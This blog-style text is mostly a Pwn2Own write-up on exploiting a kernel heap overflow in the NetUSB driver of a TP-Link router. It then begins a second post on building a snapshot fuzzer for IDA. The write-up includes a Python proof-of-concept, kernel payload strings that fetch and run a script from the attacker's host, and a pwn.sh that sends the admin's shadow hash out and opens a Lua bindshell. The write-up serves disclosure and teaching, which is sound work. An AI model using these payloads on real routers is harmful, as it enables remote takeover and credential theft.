udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
udp        0      0 0.0.0.0:42998           0.0.0.0:*                           5883/conn-indicator
udp        0      0 :::domain               :::*                                4377/dnsmasq


At first sight, the following processes looked interesting: - the uhttpd HTTP server, - the third-party dnsmasq service that potentially could be unpatched to upstream bugs (unlikely?), - the tdpServer which was popped back in 2021 and was a vector for a vuln exploited in sync-server.

# Chasing ghosts

Because I was familiar with how the uhttpd HTTP server worked on my home router I figured I would at least spend a few days looking at the one running on the target router. The HTTP server is able to run and invoke Lua extensions and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed at analyzing those extensions which was both frustrating and puzzling. Long story short, it seems like the Lua runtime used on the router has been modified such that the opcode table appears shuffled. As a result, the compiled extensions would break all the public tools because the opcodes wouldn't match. Silly. I eventually managed to decompile some of those extensions and found one bug but it probably was useless from an attacker perspective. It was time to move on as I didn't feel there was enough potential for me to find something interesting there.

One another thing I burned time on is to go through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to figure out if dnsmasq was properly patched to recent vulns that have been published in the past years. It looked like some vulns weren't patched, but the disassembly showed different 😔. Dead-end.

# NetUSB shenanigans

There were two strange lines in the netstat output from above that did stand out to me:

tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -


Why is there no process name associated with those sockets uh 🤔? Well, it turns out that after googling and looking around those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I saw this. Kinda exciting though.

This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild stuff is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also not a surprise to see that multiple vulnerabilities were discovered and exploited in the past and that indeed TP-Link was not the only router to ship this module.

Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.

After grinding through it for a while things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper in the code. After enumerating a lot of places where the attacker inputs is parsed and used, I found this one spot where I could overflow an integer in arithmetic fed to an allocation function:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
// ...
result = (void *)SoftwareBus_fillBuf(SbusConnection, v64, 4);
if(result) {
v64[0] = _bswapw(v64[0]); <----------------------- attacker controlled
Payload_1 = mallocPageBuf(v64[0] + 9, 0xD0); <---- overflow
// ...


I first thought this was going to lead to a wild overflow type of bug because the code would try to read a very large number of bytes into this buffer but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefuly, the SoftwareBus_fillBuf function is actually defined as follows:

int SoftwareBus_fillBuf(SbusConnection_t *SbusConnection, void *Buffer, int BufferLen) {
if(SbusConnection)
if(Buffer) {
if(BufferLen) {
while (1) {
GetLen = KTCP_get(SbusConnection, SbusConnection->ClientSocket, Buffer, BufferLen);
if ( GetLen <= 0 )
break;
BufferLen -= GetLen;
Buffer = (char *)Buffer + GetLen;
if ( !BufferLen )
return 1;
}
kc_printf("INFO%04X: _fillBuf(): len = %d\n", 1275, GetLen);
return 0;
}
else {
return 1;
}
} else {
// ...
return 0;
}
}
else {
// ...
return 0;
}
}


KTCP_get is basically a wrapper around ks_recv, which basically means an attacker can force the function to return without reading the whole BufferLen amount of bytes. This meant that I could force an allocation of a small buffer and overflow it with as much data I wanted. If you are interested to learn on how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py or you can also read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The below code can trigger the above vulnerability:

from Crypto.Cipher import AES
import socket
import struct
import argparse

le8 = lambda i: struct.pack('=B', i)
le32 = lambda i: struct.pack('<I', i)

netusb_port = 20005

def send_handshake(s, aes_ctx):
# Version
s.send(b'\x56\x04')
# Send random data
s.send(aes_ctx.encrypt(b'a' * 16))
_ = s.recv(16)
# Receive & send back the random numbers.
challenge = s.recv(16)
s.send(aes_ctx.encrypt(challenge))

def send_bus_name(s, name):
length = len(name)
assert length - 1 < 63
s.send(le32(length))
b = name
if type(name) == str:
b = bytes(name, 'ascii')
s.send(b)

def create_connection(target, port, name):
second_aes_k = bytes.fromhex('5c130b59d26242649ed488382d5eaecc')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
aes_ctx = AES.new(second_aes_k, AES.MODE_ECB)
send_handshake(s, aes_ctx)
send_bus_name(s, name)
return s, aes_ctx

def main():
parser = argparse.ArgumentParser('Zenith PoC2')
args = parser.parse_args()
s, _ = create_connection(args.target, netusb_port, 'PoC2')
s.send(le8(0xff))
s.send(le8(0x21))
s.send(le32(0xff_ff_ff_ff))
p = b'\xab' * (0x1_000 * 100)
s.send(p)


Another interesting detail was that the allocation function is mallocPageBuf which I didn't know about. After looking into its implementation, it eventually calls into _get_free_pages which is part of the Linux kernel. _get_free_pages allocates 2**n number of pages, and is implemented using what is called, a Binary Buddy Allocator. I wasn't familiar with that kind of allocator, and ended-up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.

Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding the bug would give me full control over the content and I was able to overflow the pages with pretty much as much data as I wanted. The only thing that I couldn't fully control was the size passed to the allocation. The only limitation was that I could only trigger a mallocPageBuf call with a size in the following interval: [0, 8] because of the integer overflow. mallocPageBuf aligns the passed size to the next power of two, and calculates the order (n in 2**n) to invoke _get_free_pages.

Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but instead try to run until it couldn't anymore. Sweet.

I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could also be helpful for both synchronization and leaking some allocations made by the driver.

int kc_printf(const char *a1, ...) {
// ...
v1 = vsprintf(v6, a1);
v2 = v1 < 257;
v3 = v1 + 1;
if(!v2) {
v6[256] = 0;
v3 = 257;
}
v5 = v3;
kc_dbgD_send(&v5, v3 + 4); // <-- send over socket
return printk("<1>%s", v6);
}


Pretty funny right?

# Booting NetUSB in QEMU

Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob so this lack of introspections wasn't going to work. What are my options?

Well, as I mentioned earlier TP-Link is maintaining a GPL archive which has information on the Linux version they use, the patches they apply and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point to be able to debug this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement with my current situation. I would be able to hook-up GDB, inspect the allocator state, and hopefully make progress.

Turns out this was much harder than I thought. I started by trying to build the kernel via the GPL archive. In appearance, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest I mostly forgot all the details here but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.

I thought this was the end of my suffering but it was in fact not it. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. I decided to look at the problem from a different angle. Instead, I downloaded a Linux MIPS QEMU image from aurel32's website that was booting just fine, and decided that I would try to merge both of the kernel configurations until I end up with a bootable image that has a configuration as close as possible from the kernel running on the device. Same kernel version, allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.

Again, because I am a complete Linux noob I failed to really see the complexity there. So I got started on this journey where I must have compiled easily 100+ kernels until being able to load and execute the NetUSB.ko driver in QEMU. The main challenge that I failed to see was that in Linux land, configuration flags can change the size of internal structures. This means that if you are trying to run a driver A on kernel B, the driver A might mistake a structure to be of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. So I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device defined below shows that its definition varies depending on kernel configuration options being on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any types used by this structure can do the same which means that looking at the main definition of a structure is not enough.

struct net_device {
// ...
#ifdef CONFIG_WIRELESS_EXT
/* List of functions to handle Wireless Extensions (instead of ioctl).
* See <net/iw_handler.h> for details. Jean II */
const struct iw_handler_def * wireless_handlers;
/* Instance data managed by the core of Wireless Extensions. */
struct iw_public_data * wireless_data;
#endif
// ...
#if IS_ENABLED(CONFIG_VLAN_8021Q)
struct vlan_info __rcu  *vlan_info; /* VLAN info */
#endif
#if IS_ENABLED(CONFIG_NET_DSA)
struct dsa_switch_tree  *dsa_ptr; /* dsa specific data */
#endif
// ...
#ifdef CONFIG_SYSFS
struct kset   *queues_kset;
#endif

#ifdef CONFIG_RPS
struct netdev_rx_queue  *_rx;

/* Number of RX queues allocated at register_netdev() time */
unsigned int    num_rx_queues;

/* Number of RX queues currently active in device */
unsigned int    real_num_rx_queues;

#ifdef CONFIG_RFS_ACCEL
/* CPU reverse-mapping for RX completion interrupts, indexed
* by RX queue number.  Assigned by driver.  This must only be
* set if the ndo_rx_flow_steer operation is defined. */
struct cpu_rmap   *rx_cpu_rmap;
#endif
#endif
//...
};


Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash and try to look at the code / structures involved and see if a kernel configuration option would impact the layout of a relevant structure. From there, I could see the difference between the kernel configuration for my bootable QEMU image and the kernel I had built from the GPL and see where were mismatches. If there was one, I could simply turn the option on or off, recompile and hope that it doesn't make the kernel unbootable under QEMU.

After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:

[email protected]:~/pwn2own$qemu-system-mips -m 128M -nographic -append "root=/dev/sda1 mem=128M" -kernel linux338.vmlinux.elf -M malta -cpu 74Kf -s -hda debian_wheezy_mips_standard.qcow2 -net nic,netdev=network0 -netdev user,id=network0,hostfwd=tcp:127.0.0.1:20005-10.0.2.15:20005,hostfwd=tcp:127.0.0.1:33344-10.0.2.15:33344,hostfwd=tcp:127.0.0.1:31337-10.0.2.15:31337 [...] [email protected]:~# ./start.sh [ 89.092000] new slab @ 86964000 [ 89.108000] kcg 333 :GPL NetUSB up! [ 89.240000] NetUSB: module license 'Proprietary' taints kernel. [ 89.240000] Disabling lock debugging due to kernel taint [ 89.268000] kc 90 : run_telnetDBGDServer start [ 89.272000] kc 227 : init_DebugD end [ 89.272000] INFO17F8: NetUSB 1.02.69, 00030308 : Jun 11 2015 18:15:00 [ 89.272000] INFO17FA: 7437: Archer C7 :Archer C7 [ 89.272000] INFO17FB: AUTH ISOC [ 89.272000] INFO17FC: filterAudio [ 89.272000] usbcore: registered new interface driver KC NetUSB General Driver [ 89.276000] INFO0145: init proc : PAGE_SIZE 4096 [ 89.280000] INFO16EC: infomap 869c6e38 [ 89.280000] INFO16EF: sleep to wait eth0 to wake up [ 89.280000] INFO15BF: tcpConnector() started... : eth0 NetUSB 160207 0 - Live 0x869c0000 (P) GPL_NetUSB 3409 1 NetUSB, Live 0x8694f000 [email protected]:~# [ 92.308000] INFO1572: Bind to eth0  For the readers that would like to do the same, here are some technical details that they might find useful (I probably forgot most of the other ones): - I used debootstrap to easily be able to install older Linux distributions until one worked fine with package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution to build the GPL code from TP-Link as well as cross-compiling the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract those on a regular Ubuntu Intel x64 VM and chroot in those folders and SHOULD be able to reproduce what I described. Or at least, be very close from reproducing. - I cross compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz which is downloaded / compiled from the GPL code, or you can grab the binaries directly off wheezy-compile-kernel.tar.xz. - You can find the command line I used to start QEMU in start_qemu.sh and dbg.sh to attach GDB to the kernel.

# Enters Zenith

Once I was able to attach GDB to the kernel I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had done to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later if I even get there.

I started to read a lot of code, documentation and papers about Linux kernel exploitation. The linux kernel version was old enough that it didn't have a bunch of more recent mitigations. This gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet sockets Andrey Konovalov describes in details an attack that looked like could work for the bug I had found. Also, read the article as it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages off the kernel and as a result, we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes) which would force blocks from the higher order to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000 which would mean I could get a 0x1000 block adjacent to another 0x1000 block that could be now used by a kmalloc-1024 slab. I struggled and tried a lot of things and never managed to pull it off. I remember the bug had a few annoying things I hadn't realized when finding it, but I am sure a more experienced Linux kernel hacker could have written an exploit for this bug.

I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug but in a kmalloc'd region as I wouldn't have to deal with the same problems as above. I would still need to worry about being able to place the buffer adjacent to a juicy corruption target though. After looking around for a bit longer I found another integer overflow:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
// ...
case 0x50:
AllocatedBuffer = _kmalloc(ReceivedSize + 17, 208);
if (!AllocatedBuffer) {
return kc_printf("INFO%04X: Out of memory in USBSoftwareBus", 4296);
}
// ...
if (!SoftwareBus_fillBuf(SbusConnection, AllocatedBuffer + 16, ReceivedSize))


Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what type of useful objects I would be able to put there from over the network. After a bunch of trial and error I started to notice that if I was taking a small pause after the allocation of the buffer but before overflowing it, an interesting structure would be magically allocated fairly close from my buffer. To this day, I haven't fully debugged where it exactly came from but as this was my only lead I went along with it.

The target kernel doesn't have ASLR and doesn't have NX, so my exploit is able to hardcode addresses and execute the heap directly which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a 3MB large allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to output the address on the real device after the allocation as I couldn't debug it.

# (gdb) x/10dwx 0xffffffff8522a000
# 0x8522a000:     0xff510000      0x1000ffff      0xffff4433      0x22110000
# 0x8522a010:     0x0000000d      0x0000000d      0x0000000d      0x0000000d
# 0x8522a020:     0x0000000d      0x0000000d

# ...

def main(stdscr):
# ...
_3mb = 3 * 1_024 * 1_024
leaker.wait_for_one()
y += 1


My final exploit, Zenith, overflows an adjacent wait_queue_head_t.head.next structure that is placed by the socket stack of the Linux kernel with the address of a crafted wait_queue_entry_t under my control (Trasher class in the exploit code). This is the definition of the structure:

struct wait_queue_head {
spinlock_t    lock;
};

struct wait_queue_entry {
unsigned int    flags;
void      *private;
wait_queue_func_t func;
};


This structure has a function pointer, func, that I use to hijack the execution and redirect the flow to a fixed location, in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func function pointer is __wake_up_common and you can see its code below:

static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
int nr_exclusive, int wake_flags, void *key)
{
wait_queue_t *curr, *next;

unsigned flags = curr->flags;

if (curr->func(curr, mode, wake_flags, key) &&
(flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
break;
}
}


This is what it looks like in GDB once q->head.next/prev has been corrupted:

(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00 (gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff (gdb) c Continuing. sock_recvmsg(dst=0xffffffff85173390) Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1) at kernel/sched/core.c:3375 3375 kernel/sched/core.c: No such file or directory. (gdb) p *q$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,

(gdb) bt
#0  __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
at kernel/sched/core.c:3375
#1  0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2  0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3  tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4  0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5  0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
#6  0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7  pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8  pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9  0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34


Once the func pointer is invoked, I get control over the execution flow and I execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to execute user mode commands as root. It pulls a shell script off a listening HTTP server on the attacker machine and executes it.

arg0: .asciiz "/bin/sh"
arg1: .asciiz "-c"
arg2: .asciiz "wget http://{ip_local}:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh"
argv: .word arg0
.word arg1
.word arg2
envp: .word 0


The pwn.sh shell script simply leaks the admin's shadow hash, and opens a bindshell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua oneliner) the attacker can connect to (if the kernel hasn't crashed yet 😳):

#!/bin/sh
export LPORT=31337
wget http://{ip_local}:8000/pwd?(grep -E admin: /etc/shadow) lua -e 'local k=require("socket"); local s=assert(k.bind("*",os.getenv("LPORT"))); local c=s:accept(); while true do local r,x=c:receive();local f=assert(io.popen(r,"r")); local b=assert(f:read("*a"));c:send(b); end;c:close();f:close();'  The exploit also uses the debug interface that I mentioned earlier as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf the Leaker class). OK at that point, it works in QEMU... which is pretty wild. Never thought it would. Ever. What's also wild is that I am still in time for the Pwn2Own registration, so maybe this is also possible 🤔. Reliability wise, it worked well enough on the QEMU environment: about 3 times about 5 I would say. Good enough. I started to port over the exploit to the real device and to my surprise it also worked there as well. The reliability was poorer but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel I was left with dmesg outputs to try to make things better. Tweak the spray here and there, try to go faster or slower; trying to find a magic combination. In the end, I didn't find anything magic; the exploit was unreliable but hey I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥: Beautiful. Time to register! # Entering the contest As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide exploits and documentation prior to the contest. Fully remote meant that the ZDI stuff would throw our exploits on the environment they had set-up. At that point we had two exploits and that's what we registered for. Right after receiving confirmation from ZDI, I noticed that TP-Link pushed an update for the router 😳. I thought Damn. I was at work when I saw the news and was stressed about the bug getting killed. Or worried that the update could have changed anything that my exploit was relying on: the kernel, etc. I finished my day at work and pulled down the firmware from the website. I checked the release notes while the archive was downloading but it didn't have any hints suggesting that they had updated either NetUSB or the kernel which was.. good. I extracted the file off the firmware file with binwalk and quickly verified the NetUSB.ko file. I grabbed a hash and ... it was the same. Wow. What a relief 😮‍💨. When the time of demonstrating my exploit came, it unfortunately didn't land in the three attempts which was a bit frustrating. Although it was frustrating, I knew from the beginning that my odds weren't the best entering the contest. I remembered that I originally didn't even think that I'd be able to compete and so I took this experience as a win on its own. On the bright side, my teammates were real pros and landed their exploits which was awesome to see 🍾🏆. # Wrapping up Participating in Pwn2Own had been on my todo list for the longest time so seeing that it could be done felt great. I also learned a lot of lessons while doing it: • Attacking the kernel might be cool, but it is an absolute pain to debug / set-up an environment. I probably would not go that route again if I was doing it again. • Vendor patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update which was annoying. Fortunately, they were able to find another vulnerability and this one stayed alive. • Getting a root shell on the device ASAP is a good idea. I initially tried to find a post auth vulnerability statically to get a root shell but that was wasted time. • The Ghidra disassembler decompiles MIPS32 code pretty well. It wasn't perfect but a net positive. • I also realized later that the same driver was running on the Netgear router and was reachable from the WAN port. I wasn't in it for the money but maybe it would be good for me to do a better job at taking a look at more than a target instead of directly diving deep into one exclusively. • The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions. • Higher payouts don't necessarily mean a harder target. You can find all the code and scripts in the zenith Github repository. If you want to read more about NetUSB here are a few more references: I hope you enjoyed the post and I'll see you next time 😊! Special thanks to my boi yrp604 for coming up with the title and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽. Oh, and come hangout on Diary of reverse-engineering's Discord server with us! # Building a new snapshot fuzzer & fuzzing IDA 15 July 2021 at 15:00 # Introduction It is January 2020 and it is this time of the year where I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It always is an exciting time for me to think and plan for the year ahead; who knows maybe it'll be the year where I get good at computers I thought (spoiler alert: it wasn't). One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like Windows Hypervisor platform APIs, KVM APIs but also try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows targets, user or kernel, application or service, kernel or drivers. He had done some work in this area so he could follow me along and help me out when I ran into problems. Great, the plan was to develop this Windows snapshot-based fuzzer running the target code into some kind of environment like a VM or an emulator. It would allow the user to instrument the target the way they wanted via breakpoints and would provide basic features that you expect from a modern fuzzer: code coverage, crash detection, general mutator, cross-platform support, fast restore, etc. Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons: 1. It is a complex Windows user-mode application, 2. It parses a bunch of binary files, 3. The application is heavy and is slow to start. The snapshot approach could help fuzz it faster than traditionally, 4. It has a bug bounty. In this blog post, I will walk you through the birth of what the fuzz, its history, and my overall journey from zero to accomplishing my initial goals. For those that want the results before reading, you can find my findings in this Github repository: fuzzing-ida75. There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers. # Architecture At this point I had a pretty good idea of what the final product should look like and how a user would use wtf: 1. The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel-crash dump and extracts the CPU state. 2. The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading physical and virtual memory ranges, read and write registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases. 3. wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory. 4. wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat. After laying out the plan, I realized that I didn't have code that parsed Windows kernel-crash dump which is essential for wtf. So I wrote kdmp-parser which is a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available on the shelf. Getting physical memory is not enough because I also needed to dump the CPU state as well as MSRs, etc. Thankfully yrp604 had already hacked up a Windbg Javascript extension to do the work and so I reused it bdump.js. Once I was able to extract the physical memory & the CPU state I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time and so I started there. bochscpu is basically bochs's CPU available from a Rust library with C bindings (yes he kindly made bindings because I didn't want to touch any Rust). It basically is a software CPU that knows how to run intel 64-bit code, knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs devices so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboards, etc. ## Bochscpu 101 The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because: 1. No need to load an entire dump of memory inside the emulator when it starts, 2. Only used memory gets mapped making the instance very light in memory usage. I also need to introduce a few acronyms that I use everywhere: 1. GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator. 2. GVA: Guest virtual address. This is guest virtual memory. 3. HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment. To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like: void StaticGpaMissingHandler(const uint64_t Gpa) { const Gpa_t AlignedGpa = Gpa_t(Gpa).Align(); BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n", AlignedGpa, Gpa); const void *DmpPage = reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage( AlignedGpa); if (DmpPage == nullptr) { BochsHooksDebugPrint( "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n", AlignedGpa); } uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size); if (Page == nullptr) { fmt::print("Failed to allocate memory in GpaMissingHandler.\n"); __debugbreak(); } if (DmpPage) { // // Copy the dump page into the new page. // memcpy(Page, DmpPage, Page::Size); } else { // // Fake it 'till you make it. // memset(Page, 0, Page::Size); } // // Tell bochscpu that we inserted a page backing the requested GPA. // bochscpu_mem_page_insert(AlignedGpa.U64(), Page); }  It is simple: 1. we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory, 2. we populate its content using the crash dump. 3. we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways. To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. This is a shortened version of LoadState: void BochscpuBackend_t::LoadState(const CpuState_t &State) { bochscpu_cpu_state_t Bochs; memset(&Bochs, 0, sizeof(Bochs)); Seed_ = State.Seed; Bochs.bochscpu_seed = State.Seed; Bochs.rax = State.Rax; Bochs.rbx = State.Rbx; //... Bochs.rflags = State.Rflags; Bochs.tsc = State.Tsc; Bochs.apic_base = State.ApicBase; Bochs.sysenter_cs = State.SysenterCs; Bochs.sysenter_esp = State.SysenterEsp; Bochs.sysenter_eip = State.SysenterEip; Bochs.pat = State.Pat; Bochs.efer = uint32_t(State.Efer.Flags); Bochs.star = State.Star; Bochs.lstar = State.Lstar; Bochs.cstar = State.Cstar; Bochs.sfmask = State.Sfmask; Bochs.kernel_gs_base = State.KernelGsBase; Bochs.tsc_aux = State.TscAux; Bochs.fpcw = State.Fpcw; Bochs.fpsw = State.Fpsw; Bochs.fptw = State.Fptw; Bochs.cr0 = uint32_t(State.Cr0.Flags); Bochs.cr2 = State.Cr2; Bochs.cr3 = State.Cr3; Bochs.cr4 = uint32_t(State.Cr4.Flags); Bochs.cr8 = State.Cr8; Bochs.xcr0 = State.Xcr0; Bochs.dr0 = State.Dr0; Bochs.dr1 = State.Dr1; Bochs.dr2 = State.Dr2; Bochs.dr3 = State.Dr3; Bochs.dr6 = State.Dr6; Bochs.dr7 = State.Dr7; Bochs.mxcsr = State.Mxcsr; Bochs.mxcsr_mask = State.MxcsrMask; Bochs.fpop = State.Fpop; #define SEG(_Bochs_, _Whv_) \ { \ Bochs._Bochs_.attr = State._Whv_.Attr; \ Bochs._Bochs_.base = State._Whv_.Base; \ Bochs._Bochs_.limit = State._Whv_.Limit; \ Bochs._Bochs_.present = State._Whv_.Present; \ Bochs._Bochs_.selector = State._Whv_.Selector; \ } SEG(es, Es); SEG(cs, Cs); SEG(ss, Ss); SEG(ds, Ds); SEG(fs, Fs); SEG(gs, Gs); SEG(tr, Tr); SEG(ldtr, Ldtr); #undef SEG #define GLOBALSEG(_Bochs_, _Whv_) \ { \ Bochs._Bochs_.base = State._Whv_.Base; \ Bochs._Bochs_.limit = State._Whv_.Limit; \ } GLOBALSEG(gdtr, Gdtr); GLOBALSEG(idtr, Idtr); // ... bochscpu_cpu_set_state(Cpu_, &Bochs); }  In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this: // // Prepare the hooks. // Hooks_.ctx = this; Hooks_.after_execution = StaticAfterExecutionHook; Hooks_.before_execution = StaticBeforeExecutionHook; Hooks_.lin_access = 